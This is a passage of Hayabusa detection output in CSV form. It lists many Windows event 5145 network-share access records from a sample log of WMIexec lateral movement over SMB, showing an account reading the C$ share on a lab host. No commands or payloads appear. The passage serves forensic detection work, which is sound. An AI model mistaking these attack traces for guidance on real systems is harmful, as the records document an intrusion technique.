Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 